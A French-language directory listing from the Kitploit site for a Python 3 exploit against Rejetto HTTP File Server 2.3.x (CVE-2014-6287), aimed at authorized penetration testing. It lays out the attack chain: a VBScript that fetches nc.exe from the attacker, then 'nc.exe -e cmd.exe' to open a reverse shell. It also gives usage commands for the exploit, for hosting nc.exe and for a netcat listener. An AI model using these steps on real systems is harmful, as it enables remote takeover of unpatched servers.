Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Exploit d'exécution de commandes à distance pour Rejetto HTTP File Server 2.3.x (CVE-2014-6287) réécrit en Python 3 pour les tests de sécurité offensive modernes. | Kitploit
Outils/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à Distance

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Exploit d'exécution de commandes à distance pour Rejetto HTTP File Server 2.3.x (CVE-2014-6287) réécrit en Python 3 pour les tests de sécurité offensive modernes.

Voir le dépôt
il y a 8 moisPas encore vérifié

Exploit d'exécution de commandes à distance HFS (CVE-2014-6287)

Il s'agit d'une réécriture en Python 3 de l'exploit classique d'exécution de commandes à distance (RCE) ciblant Rejetto HTTP File Server (HFS) v2.3.x, exploitant la vulnérabilité identifiée sous le nom de CVE-2014-6287.

Découvert à l'origine par Avinash Kumar Thapa alias « -Acid », cette version améliore la portabilité et la convivialité, en offrant une paramétrisation complète et une compatibilité moderne.


⚠️ Avertissement

Cet outil est fourni exclusivement à des fins éducatives et de tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.


📌 Détails de l'exploit

  • Vulnérabilité : Rejetto HFS v2.3.x - Exécution de commandes à distance
  • CVE : CVE-2014-6287
  • Impact : Exécution de code à distance avec privilèges système
  • Exigence : La cible doit exécuter une version vulnérable de HFS avec le scripting activé.

🚀 Fonctionnalités

  • Entièrement compatible avec Python 3
  • Accepte tous les paramètres clés via la CLI :
    • IP et port cibles
    • IP locale (attaquant)
    • Port d'écoute pour le reverse shell
    • Port utilisé pour héberger nc.exe
  • Aucune valeur codée en dur
  • Livraison classique du reverse shell nc.exe à l'aide de VBScript
  • Déroulement de l'exploit :
    1. Téléverser un script VBS pour télécharger nc.exe
    2. Exécuter le script VBS sur la cible
    3. Exécuter nc.exe -e cmd.exe pour établir le reverse shell

🛠️ Utilisation

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

Requirements:
  - HTTP server serving nc.exe:
      python3 -m http.server 8000
  - Listener:
      nc -lvnp 4444
Télécharger l’outil